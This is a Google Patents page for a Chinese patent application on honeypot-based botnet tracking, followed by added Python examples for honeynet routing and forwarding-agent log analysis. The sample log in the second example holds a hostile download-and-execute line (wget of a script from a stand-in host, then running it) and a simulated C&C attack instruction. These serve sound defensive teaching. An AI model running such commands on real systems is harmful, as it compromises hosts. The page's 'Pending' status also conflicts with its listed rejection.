CN111083117A - Botnet tracking and tracing system based on honeypots - Google Patents
- Publication number: CN111083117A
- Application number: CN201911161703.1A
- Authority: CN (China)
- Prior art keywords: honeypot, botnet, honeypots, attack, communication
- Legal status: Pending (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Classifications
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
  - H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    - H04L63/1416—Event detection, e.g. attack signature detection
    - H04L63/1425—Traffic logging, e.g. anomaly detection
  - H04L63/1441—Countermeasures against malicious traffic
    - H04L63/1458—Denial of Service
    - H04L63/1483—Countermeasures against malicious traffic service impersonation, e.g. phishing, pharming or web spoofing
    - H04L63/1491—Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
Abstract
The invention discloses a honeypot-based botnet tracking and tracing system in the field of computer network security, comprising a honeypot system, a log recording and analysis system, and a botnet tracking system. The system captures and records the attack process using honeypots fronted by forwarding agents: a honeypot only receives traffic from its forwarding agent, and all traffic it sends outwards passes through the forwarding agent. The forwarding agent is deployed in the network, where it receives, records and forwards the attacker's requests, while the honeypot bears and isolates the attack. The system also uses the forwarding agent to monitor the connections that honeypots infected with malicious samples make to the outside world, to record botnet activity, and to raise alarms on discovered attack behavior. Compared with a traditional honeypot system, the system has better concealment and flexibility, and can be expanded as usage requires.
Description
Technical Field
The invention relates to the field of computer network security, in particular to a botnet tracing system based on honeypots.
Background
A botnet is a network composed of infected hosts. The malicious process running on an infected host is called a bot, and the attacker issues instructions through a command-and-control server (C&C server) to make the bots attack the outside world. The greatest advantage of a botnet is the large number of hosts it has available for an attack. Botnets are one of the most serious security threats in today's network environment and are used for a variety of malicious activities against systems and services, including denial-of-service attacks, spam distribution, phishing, click fraud, and the like. Most botnets communicate over common protocols and use hiding techniques to conceal the back-end C&C server, which makes them difficult to detect and monitor. Because of their large size and strong concealment, botnets have become one of the biggest threats to network security.
The life cycle of a botnet comprises six phases: construction, recruitment, interaction, sales, attack execution and completion. The phases are linear, which means that a botnet attack can only be executed successfully if all previous phases have completed successfully. Most botnets use hiding techniques to conceal themselves; common techniques currently include encryption, polymorphism, IP spoofing, FF (fast-flux) networks, and the like.
There are currently two main approaches to botnet detection: honeypot-based detection and detection based on traffic monitoring. Honeypots are widely used for collecting and studying malicious samples. Traffic-monitoring-based detection can be subdivided into signature-based, anomaly-based, DNS-based and data-mining-based detection. Effective network security management depends in large part on accurate, concise and high-quality information about malicious activity in the network, and honeypots are an effective tool for obtaining it. Although honeypots cannot directly detect infections, they are one of the most effective tools for collecting and studying malicious samples. Honeypots also have their disadvantages. In summary, a botnet tracking tool has to understand the communication mode of the botnet's C&C traffic, because otherwise communication errors during the interaction phase allow attackers to recognize it, and the continued progress of reverse-analysis techniques makes tracking tools more difficult to develop.
Those skilled in the art have therefore worked to develop a honeypot-based botnet tracing system that combines manual analysis of malicious samples with a log recording and analysis system, and that traces botnets by simulating or parsing botnet communication.
Disclosure of Invention
In view of the above defects of the prior art, the technical problem to be solved by the invention is to develop a novel honeypot tracing system that has better concealment and flexibility and can be expanded as usage requires.
To achieve this, the invention provides a honeypot-based botnet tracking and tracing system comprising a honeypot system, a log recording and analysis system, and a botnet tracking system. The honeypot system comprises a forwarding agent and a honeypot and is used to forge a real network environment and capture malicious samples. The forwarding agent is deployed at the network boundary; it acquires and records communication from the Internet, forwards it to the honeypot, maintains the communication between the two parties while an attack is in progress, and finally stores the attack process as a log. The honeypot bears the attack and confines the attacker's activity to the honeypot. The log recording and analysis system works together with the honeypot system: it records the attack process as logs and extracts an attack profile and malicious samples from them. The botnet tracking system isolates and monitors the communication between infected honeypots and attackers to record attacker behavior and botnet activity.
Further, the honeypot system monitors the honeypot using only the forwarding agent.
Further, the honeypot system maintains a honeynet architecture, forming a virtual network structure among multiple honeypots to confuse attackers.
Further, the malicious samples captured by the log recording and analysis system may be used for tracking and tracing the botnet and for defending against attacks.
Further, the botnet tracking system may be used to discover attack behavior and give early warning of it.
Further, the malicious samples are analyzed manually.
Further, the botnet tracking system tracks the botnet by simulating or parsing communication in the botnet.
Further, the communication mode of the botnet may be used for research and defense.
The invention also provides a honeypot-based process for capturing botnet malicious samples, comprising the following steps:
Step 101: deploy and configure the honeypots. The honeypots may use Docker, virtual machines and the like, and basic network services such as FTP (File Transfer Protocol) and Web are configured in them.
Step 102: deploy forwarding agents at different positions in the network, open common service ports such as 22 and 80 to the outside, configure the honeypots as the forwarding destinations, and configure the honeynet nodes so that the honeypots form a false network structure.
Step 103: an attacker finds the open ports of a forwarding agent with a scanning tool and attacks.
Step 104: the forwarding agent receives the attacker's connection request, forwards the communication to the honeypot, and stores all communication as a log.
Step 105: the honeypot lets the attack proceed normally and confines the attack to the honeypot.
Step 106: if the attacker tries to use the infected honeypot as a springboard to attack other hosts in the internal network, the forwarding agent forwards the attack to other honeypots, so that the attacker mistakenly believes they are inside an organization's network.
The invention also provides a honeypot-based botnet tracking and tracing process, comprising the following steps:
Step 107: expert A analyzes the log stored for the infected honeypot.
Step 108: expert A uses the log recording and analysis system to preprocess the log and obtain an attack profile and a malicious sample.
Step 109: expert A reverse-analyzes the malicious sample to obtain the address of the C&C server, the communication protocol between the bot and the C&C server, and the encryption mode.
Step 110: the information obtained from the analysis is used to refine the forwarding agent.
Step 111: the forwarding agent intercepts and records the communication between the malicious sample in the infected honeypot and the outside world, and stores it as a log.
Step 112: the communication traffic of the infected honeypots is monitored.
Step 113: if an attack instruction is found during monitoring, an alarm is raised.
The invention captures and records the attack process using honeypots fronted by forwarding agents. The forwarding agent is deployed in the network, where it receives, records and forwards the attacker's requests, while the honeypot bears and isolates the attack. Honeypots only accept traffic from agents, and all traffic they send out goes through agents. Besides recording the attack process and forwarding the attacker's commands, the forwarding agent also maintains the structure of the honeynet. Specifically, each honeypot in the honeynet is assigned one IP address or a range of IP addresses; when an agent detects that its honeypot has sent a malicious packet whose destination is an address assigned to another honeypot, it forwards the packet to that honeypot's agent, simulating a real network environment. This approach effectively counters behavior-based honeypot detection methods. As for detection methods based on system-level fingerprinting and on detection vectors, the honeypot system monitors traffic through the forwarding agent rather than running a monitoring tool directly, which reduces the probability of being detected by either method.
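The routing rule described above, as an added example (not code from the patent): a Python sketch of the decision a forwarding agent takes for each packet its honeypot sends. The class names, the 10.20.0.0/16 fake network, the action labels, and the choice to drop traffic to unassigned internal addresses are assumptions made for illustration.

```python
import ipaddress
from dataclasses import dataclass, field


@dataclass
class Honeypot:
    name: str
    fake_addrs: list                 # single IPs or CIDR ranges this honeypot "owns"
    nets: list = field(init=False)

    def __post_init__(self):
        # ip_network("10.20.0.5") yields a /32. Parsing is strict, so a typo
        # such as "10.20.1.3/28" (host bits set) is rejected with ValueError.
        self.nets = [ipaddress.ip_network(a) for a in self.fake_addrs]

    def owns(self, ip):
        return any(ip in net for net in self.nets)


class HoneynetRouter:
    """Decides what an agent does with a packet sent BY its honeypot."""

    def __init__(self, honeypots, internal_net):
        self.internal = ipaddress.ip_network(internal_net)
        self.honeypots = {}
        self.log = []                # decisions, in the order they were taken
        claimed = []
        for hp in honeypots:
            for net in hp.nets:
                if (net.version != self.internal.version
                        or not net.subnet_of(self.internal)):
                    raise ValueError(f"{hp.name}: {net} is outside {self.internal}")
                # Two honeypots answering for one address would break the illusion.
                for owner, other in claimed:
                    if net.overlaps(other):
                        raise ValueError(f"{net} ({hp.name}) overlaps {other} ({owner})")
                claimed.append((hp.name, net))
            self.honeypots[hp.name] = hp

    def route(self, src_name, dst_ip, dst_port):
        src = self.honeypots[src_name]
        ip = ipaddress.ip_address(dst_ip)
        owner = next((h for h in self.honeypots.values() if h.owns(ip)), None)
        if owner is src:
            action, target = "deliver_local", src.name
        elif owner is not None:
            # Lateral movement attempt: hand it to the peer honeypot's agent.
            action, target = "redirect", owner.name
        elif ip in self.internal:
            # Assumption: an unassigned fake-network address is never mapped
            # to a real host, so the packet is dropped (and still logged).
            action, target = "drop", None
        else:
            # Leaves the honeynet: the agent records it (candidate C&C or
            # sample download); forwarding or blocking is a policy decision.
            action, target = "record_external", None
        self.log.append({"src": src_name, "dst": f"{ip}:{dst_port}",
                         "action": action, "target": target})
        return action, target


def demo_router():
    """Constructed three-honeypot honeynet used for the demonstration."""
    return HoneynetRouter(
        [Honeypot("web", ["10.20.0.5"]),
         Honeypot("db", ["10.20.0.6"]),
         Honeypot("office", ["10.20.1.0/28"])],
        internal_net="10.20.0.0/16")


if __name__ == "__main__":
    router = demo_router()
    for dst, port in [("10.20.0.6", 3306), ("10.20.1.9", 445),
                      ("10.20.1.16", 445), ("203.0.113.7", 6667)]:
        print(dst, port, router.route("web", dst, port))
```

The overlap check at construction time matters for the deception itself: if two honeypots claimed the same address, repeated probes from an infected honeypot could get inconsistent answers.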
The conception, specific structure and technical effects of the invention are further described below with reference to the accompanying drawings, so that its objects, features and effects can be fully understood.
Drawings
FIG. 1 is a schematic diagram of the honeypot-based botnet tracking and tracing system in accordance with a preferred embodiment of the present invention;
FIG. 2 is a flowchart of the operation of the honeypot-based botnet tracking and tracing system in accordance with a preferred embodiment of the present invention;
FIG. 3 is a schematic diagram of the honeypot system of the honeypot-based botnet tracking and tracing system in accordance with a preferred embodiment of the present invention;
FIG. 4 is a schematic diagram of the log recording and analysis system of the honeypot-based botnet tracking and tracing system in accordance with a preferred embodiment of the present invention;
FIG. 5 is a schematic diagram of the botnet tracking system of the honeypot-based botnet tracking and tracing system in accordance with a preferred embodiment of the present invention.
Detailed Description
The technical contents of the preferred embodiments of the present invention will be more clearly and easily understood by referring to the drawings attached to the specification. The present invention may be embodied in many different forms of embodiments and the scope of the invention is not limited to the embodiments set forth herein.
As shown in FIG. 1, the invention designs a honeypot-based botnet tracking and tracing system that forges a real network environment through a honeynet and forwarding agents, and monitors the honeypots using only the forwarding agents, which improves concealment and deception. The system is deployed in a network; the honeypot system captures malicious samples, the samples are analyzed manually, and, with the assistance of the log recording and analysis system, the botnet is tracked by simulating or parsing its communication. The system consists of the following modules:
1) Honeypot system: deployed at the network boundary; acquires and records communication from the Internet, forwards it to the honeypot, maintains the communication between the two parties while an attack is in progress, and finally stores the attack process as a log;
2) Log recording and analysis system: works together with the honeypot system, records the attack process as logs, and extracts an attack profile and malicious samples by analyzing the logs;
3) Botnet tracking system: records attacker behavior and discovers and alerts on attack activity, either by simulating the communication between the malicious sample and its C&C server or by isolating and monitoring the communication of the infected honeypot.
The workflow of the honeypot-based botnet tracking and tracing system is shown in FIG. 2.
Honeypot systems are deployed at different positions in the network. The target honeypot uses Docker, a virtual machine or a physical host, chosen according to actual conditions, with the corresponding services configured in it. To save resources, honeypot systems at different locations can share the same target honeypot. Since honeypots provide no actual service, any access to or operation on a honeypot is considered suspicious attack behavior. A normally operating honeypot captures all attack behavior without false negatives. In the system designed by the invention, the honeypot saves all communication between the attacker and the honeypot during the attack as a log. The log is then processed manually. First, the log is preprocessed with the log recording and analysis system, which can restore the attack flow and extract the tools and malicious samples uploaded by the attacker. Next, expert A reverse-analyzes the malicious sample to obtain the address of the C&C server, the communication protocol between the bot and the C&C server, and the encryption mode. Finally, the infected honeypots are monitored according to the information obtained from the analysis to obtain a record of botnet activity.
FIG. 3 shows the honeypot system of the honeypot-based botnet tracking and tracing system.
The honeypot system is the main component of the system. Its purpose is to provide a forged network environment that simulates a real system and to attract attackers, so as to obtain the attack process and malicious samples; in addition, infected honeypots can be used for subsequent botnet tracking. The module consists mainly of a forwarding agent and a honeypot. The forwarding agent is deployed in the network, exposes ports to the outside world, and waits for attackers to connect. When the agent receives an attacker's connection request, it establishes a connection with the corresponding honeypot, records the data sent by the attacker, and forwards it to the honeypot. The honeypot bears attacks and isolates malicious samples; it is managed manually and can use Docker, a virtual machine or an isolated real host.
FIG. 4 shows the log recording and analysis system of the honeypot-based botnet tracking and tracing system.
The purpose of the log recording and analysis system is to provide logging while the honeypot system is working and to assist security personnel in analyzing the attack process. While running, the honeypot system calls the logging interface to pass the captured communication to the log recording and analysis system, which records the attack process in a format that is easy for security personnel to analyze. In addition, when analyzing malicious samples, researchers call the log analysis interface to obtain the analysis of the attack process and the malicious samples captured by the honeypot system.
FIG. 5 shows the botnet tracking system of the honeypot-based botnet tracking and tracing system.
Communication between the botnet malicious sample and the C&C server is monitored by setting up a forwarding agent, which intercepts, records and forwards the communication between the C&C server and the malicious sample. The foregoing is a detailed description of the preferred embodiments of the invention.
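An added example, not part of the patent, of the kind of processing the log recording and analysis system and the botnet tracking system perform on forwarding-agent logs: it builds a per-attacker profile, lists the hosts the infected honeypot contacted, and flags received data that matches analyst-supplied instruction patterns. The JSON Lines record layout, the field names, the sample log and the `ATTACK` keyword are constructed for illustration.

```python
import json
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed forwarding-agent log (JSON Lines). Field names are assumptions:
#   flow "ingress" = session opened by a remote host to an exposed port,
#   flow "egress"  = connection opened by the honeypot itself;
#   sender "peer"/"pot" says which side sent the data.
SAMPLE_LOG = """\
{"ts": 40, "flow": "ingress", "sender": "peer", "peer": "203.0.113.99", "port": 80, "data": "GET / HTTP/1.1"}
{"ts": 101, "flow": "ingress", "sender": "peer", "peer": "203.0.113.7", "port": 22, "data": "cd /tmp; wget http://198.51.100.23/x.sh; sh x.sh"}
{"ts": 100, "flow": "ingress", "sender": "peer", "peer": "203.0.113.7", "port": 22, "data": "uname -a"}
{"ts": 130, "flow": "egre
{"ts": 130, "flow": "egress", "sender": "pot", "peer": "198.51.100.23", "port": 80, "data": "GET /x.sh HTTP/1.1"}
{"ts": 160, "flow": "egress", "sender": "pot", "peer": "192.0.2.44", "port": 6667, "data": "HELLO id=hp-7731"}
{"ts": 900, "flow": "egress", "sender": "peer", "peer": "192.0.2.44", "port": 6667, "data": "ATTACK target=198.51.100.200 secs=60"}
"""

REQUIRED = ("ts", "flow", "sender", "peer", "port", "data")
URL_RE = re.compile(r"https?://[^\s;'\"]+")


def parse_log(text):
    """Return (records sorted by time, number of unusable lines)."""
    records, bad = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            rec = json.loads(line)
        except ValueError:          # truncated or corrupted line
            rec = None
        if not isinstance(rec, dict) or not all(k in rec for k in REQUIRED):
            bad += 1
            continue
        records.append(rec)
    return sorted(records, key=lambda r: r["ts"]), bad


def build_profiles(records):
    """One profile per remote address that sent data to an exposed port."""
    profiles = defaultdict(lambda: {"first_seen": None, "last_seen": None,
                                    "ports": set(), "inputs": [],
                                    "sample_urls": []})
    for r in records:
        if r["flow"] != "ingress" or r["sender"] != "peer":
            continue
        p = profiles[r["peer"]]
        if p["first_seen"] is None:
            p["first_seen"] = r["ts"]
        p["last_seen"] = r["ts"]
        p["ports"].add(r["port"])
        p["inputs"].append(r["data"])
        # URLs in attacker input point at the tools and samples to collect.
        for url in URL_RE.findall(r["data"]):
            if url not in p["sample_urls"]:
                p["sample_urls"].append(url)
    return dict(profiles)


def egress_peers(records, profiles):
    """Hosts the honeypot contacted on its own. Those not explained by a
    download URL are handed to the analyst as C&C candidates; the reverse
    analysis of step 109 still has to confirm them."""
    download_hosts = {urlsplit(u).hostname
                      for p in profiles.values() for u in p["sample_urls"]}
    peers = {r["peer"] for r in records if r["flow"] == "egress"}
    return {"sample_sources": sorted(peers & download_hosts),
            "cc_candidates": sorted(peers - download_hosts)}


def attack_alerts(records, instruction_patterns):
    """Step 113: data received on an egress connection that matches a pattern
    the analyst derived from the reversed protocol."""
    compiled = [re.compile(p) for p in instruction_patterns]
    return [(r["ts"], r["peer"], r["data"]) for r in records
            if r["flow"] == "egress" and r["sender"] == "peer"
            and any(c.search(r["data"]) for c in compiled)]


if __name__ == "__main__":
    recs, bad_lines = parse_log(SAMPLE_LOG)
    profs = build_profiles(recs)
    print("unusable lines:", bad_lines)
    print("profiles:", profs)
    print("egress:", egress_peers(recs, profs))
    print("alerts:", attack_alerts(recs, [r"^ATTACK\b"]))
```

Counting unusable lines instead of silently skipping them gives the analyst a signal when the agent's log was truncated or tampered with.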
It should be understood that numerous modifications and variations could be devised by those skilled in the art in light of the present teachings without departing from the inventive concepts. Therefore, the technical solutions available to those skilled in the art through logic analysis, reasoning and limited experiments based on the prior art according to the concept of the present invention should be within the scope of protection defined by the claims.
Claims (10)
1. A honeypot-based botnet tracking and tracing system, characterized by comprising a honeypot system, a log recording and analysis system, and a botnet tracking system; the honeypot system comprises a forwarding agent and a honeypot and is used to forge a real network environment and capture malicious samples; the forwarding agent is deployed at the network boundary and is used to acquire and record communication from the Internet, forward it to the honeypot, maintain the communication between the two parties while an attack is in progress, and finally store the attack process as a log, the honeypot bearing the attack and confining the attacker's activity to the honeypot; the log recording and analysis system works together with the honeypot system, records the attack process as logs, and extracts an attack profile and malicious samples from the logs; the botnet tracking system isolates and monitors the communication between infected honeypots and attackers to record attacker behavior and botnet activity.
2. The honeypot-based botnet tracking and tracing system of claim 1, wherein the honeypot system monitors the honeypots using only the forwarding agents.
3. The honeypot-based botnet tracking and tracing system of claim 1, wherein the honeypot system maintains a honeynet architecture that forms a virtual network structure among multiple honeypots to confuse attackers.
4. The honeypot-based botnet tracking and tracing system of claim 1, wherein the malicious samples captured by the log recording and analysis system can be used for tracking and tracing the botnet and for defending against attacks.
5. The honeypot-based botnet tracking and tracing system of claim 1, wherein the botnet tracking system can be used to discover attack behavior and give early warning of it.
6. The honeypot-based botnet tracking and tracing system of claim 1, wherein the malicious samples are analyzed manually.
7. The honeypot-based botnet tracking and tracing system of claim 1, wherein the botnet tracking system tracks botnets by simulating or parsing communication in the botnet.
8. The honeypot-based botnet tracking and tracing system of claim 1, wherein the communication mode of the botnet can be used for research and defense.
9. A honeypot-based process for capturing botnet malicious samples, characterized by comprising the following steps:
Step 101: deploy and configure the honeypots, wherein the honeypots may use Docker, virtual machines and the like, and basic network services such as FTP (File Transfer Protocol) and Web are configured in them;
Step 102: deploy forwarding agents at different positions in the network, open common service ports such as 22 and 80 to the outside, configure the honeypots as the forwarding destinations, and configure the honeynet nodes so that the honeypots form a false network structure;
Step 103: an attacker finds the open ports of a forwarding agent with a scanning tool and attacks;
Step 104: the forwarding agent receives the attacker's connection request, forwards the communication to the honeypot, and stores all communication as a log;
Step 105: the honeypot lets the attack proceed normally and confines the attack to the honeypot;
Step 106: if the attacker tries to use the infected honeypot as a springboard to attack other hosts in the internal network, the forwarding agent forwards the attack to other honeypots, so that the attacker mistakenly believes they are inside an organization's network.
10. A honeypot-based botnet tracking and tracing process, characterized by comprising the following steps:
Step 107: expert A analyzes the log stored for the infected honeypot;
Step 108: expert A uses the log recording and analysis system to preprocess the log and obtain an attack profile and a malicious sample;
Step 109: expert A reverse-analyzes the malicious sample to obtain the address of the C&C server, the communication protocol between the bot and the C&C server, and the encryption mode;
Step 110: the information obtained from the analysis is used to refine the forwarding agent;
Step 111: the forwarding agent intercepts and records the communication between the malicious sample in the infected honeypot and the outside world, and stores it as a log;
Step 112: the communication traffic of the infected honeypots is monitored;
Step 113: if an attack instruction is found during monitoring, an alarm is raised.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201911161703.1A (published as CN111083117A) | 2019-11-22 | 2019-11-22 | Botnet tracking and tracing system based on honeypots |
Publications (1)
Publication Number | Publication Date |
---|---|
CN111083117A | 2020-04-28 |
Family
ID=70311832
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201911161703.1A (published as CN111083117A; status: Pending) | Botnet tracking and tracing system based on honeypots | 2019-11-22 | 2019-11-22 |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN111083117A |
Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN102790778A (en) * | 2012-08-22 | 2012-11-21 | 常州大学 | DDos (distributed denial of service) attack defensive system based on network trap |
EP2903238A2 (en) * | 2014-02-03 | 2015-08-05 | Deutsche Telekom AG | A router-based honeypot for detecting advanced persistent threats |
CN107707576A (en) * | 2017-11-28 | 2018-02-16 | 深信服科技股份有限公司 | A kind of network defense method and system based on Honeypot Techniques |
CN109768993A (en) * | 2019-03-05 | 2019-05-17 | 中国人民解放军32082部队 | A kind of high covering Intranet honey pot system |
CN109962912A (en) * | 2019-03-06 | 2019-07-02 | 中国信息安全测评中心 | A kind of defence method and system based on the drainage of honey jar flow |
CN110225064A (en) * | 2019-07-02 | 2019-09-10 | 恒安嘉新(北京)科技股份公司 | Monitor method, apparatus, equipment and the storage medium of Botnet attack |
Cited By (8)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN111835758A (en) * | 2020-07-10 | 2020-10-27 | 四川长虹电器股份有限公司 | Honeypot attacker tracing method based on TCP/UDP transparent proxy |
CN112003842A (en) * | 2020-08-12 | 2020-11-27 | 杭州安恒信息安全技术有限公司 | High-interaction honeypot system and honeypot protection method |
CN112291247A (en) * | 2020-10-30 | 2021-01-29 | 四川长虹电器股份有限公司 | Flow forwarding-based honey net system for high coverage detection of local area network |
CN112788065A (en) * | 2021-02-20 | 2021-05-11 | 苏州知微安全科技有限公司 | Internet of things zombie network tracking method and device based on honeypots and sandboxes |
CN114070630A (en) * | 2021-11-17 | 2022-02-18 | 国网四川省电力公司眉山供电公司 | Viscous honeypot system and interaction method thereof |
CN114003903A (en) * | 2021-12-28 | 2022-02-01 | 北京微步在线科技有限公司 | Network attack tracing method and device |
CN114003903B (en) * | 2021-12-28 | 2022-03-08 | 北京微步在线科技有限公司 | Network attack tracing method and device |
CN115102785A (en) * | 2022-07-25 | 2022-09-23 | 远江盛邦(北京)网络安全科技股份有限公司 | Automatic tracing system and method for network attack |
Legal Events
Code | Title | Description |
---|---|---|
PB01 | Publication | |
SE01 | Entry into force of request for substantive examination | |
RJ01 | Rejection of invention patent application after publication | Application publication date: 20200428 |